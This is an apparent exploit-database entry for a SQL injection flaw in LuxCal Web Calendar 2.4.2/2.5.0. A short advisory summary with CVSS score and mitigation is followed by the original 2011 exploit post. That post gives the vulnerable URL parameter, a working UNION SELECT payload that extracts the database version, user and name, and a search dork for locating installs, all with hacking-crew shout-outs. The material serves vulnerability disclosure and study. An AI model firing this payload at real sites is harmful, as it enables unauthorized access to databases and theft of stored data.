LuxCal Web Calendar v2.4.2 / v2.5.0 SQL Injection Vulnerability

vendor:

LuxCal Web Calendar

by:

kaMtiEz

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: LuxCal Web Calendar

Affected Version From: 2.4.2002

Affected Version To: 2.5.2000

Patch Exists: NO

Related CWE: N/A

CPE: a:luxsoft:luxcal_web_calendar

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

LuxCal Web Calendar v2.4.2 / v2.5.0 SQL Injection Vulnerability

LuxCal Web Calendar versions 2.4.2 and 2.5.0 are vulnerable to SQL injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can be done by sending a specially crafted HTTP request to the vulnerable application. This can allow an attacker to gain access to sensitive information stored in the database.

Mitigation:

The vendor has not released a patch to address this vulnerability. As a workaround, users should ensure that the application is not exposed to untrusted users.

Source

Exploit-DB raw data:

#############################################################################################################
## LuxCal Web Calendar v2.4.2 / v2.5.0 SQL Injection Vulnerability			                   ##
## Author : kaMtiEz (kamtiez@exploit-id.com)								   ##
## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id	   ##
## Date : 6 July, 2011 						                                           ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.luxsoft.eu
[+] Download : http://www.luxsoft.eu/index.php?pge=dload
[+] version : 2.4.2 - 2.5.0 or lower maybe also affected
[+] Vulnerability : SQL INJECTION
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA

#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/index.php?xP=11&id=[num]

[ XpL ]

http://127.0.0.1/[kaMtiEz]/index.php?xP=11&id=[num]

[ DEMO ]

http://127.0.0.1/luxcal/index.php?xP=11&id=-326415+union+all+select+1,2,@@version,user(),5,database(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--


[ FIX ]

dunno :">


#############################################################################################################

[ Thx TO ]

[+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9
[+] Tukulesto,arianom,el-farhatz,Jundab,Ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack,Z190T
[+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpr3t0
[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,Caddy-Dz dan teman2 semuanya yang saya tak bisa sebutkan satu2 :D

[ NOTE ] 

[+] Stop Dreaming , Lets Do it ! 
[+] Jangan Takut , Luka Pasti Akan Sembuh :)

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..